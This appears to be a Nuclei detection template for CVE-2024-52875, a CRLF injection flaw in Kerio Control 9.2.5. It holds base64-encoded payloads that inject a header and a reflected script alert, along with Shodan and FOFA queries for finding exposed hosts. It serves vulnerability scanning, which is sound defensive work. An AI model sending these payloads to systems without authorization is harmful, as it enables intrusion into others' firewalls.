id: CVE-2024-52875

info:
  name: Kerio Control v9.2.5 - CRLF Injection
  author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
  reference:
    - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52875
  classification:
    cve-id: CVE-2024-52875
    cwe-id: CWE-74
  metadata:
    verified: true
    max-request: 4
    shodan-query: "Kerio Control"
    fofa-query: "Kerio Control"
  tags: cve,cve2024,kerio,crlf

http:
  - method: GET
    path:
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^Crlf:\s*$'

      - type: dsl
        dsl:
          - "contains(body,'<script>alert(document.domain)</script>')"
          - 'contains(content_type, "text/html")'
          - 'contains(location, "")'
          - 'status_code == 302'
        condition: and
# digest: 4b0a00483046022100ba3e1692f48308aee5c4a43e2c3bfd61ebdfeab81570d1c00a1b4a40e3be1c6e022100dfe5ac9d2d69e28a65561370fcab770a365f3c86fd227aee2232d5cd8b689994:922c64590222798bb761d5b6d8e72950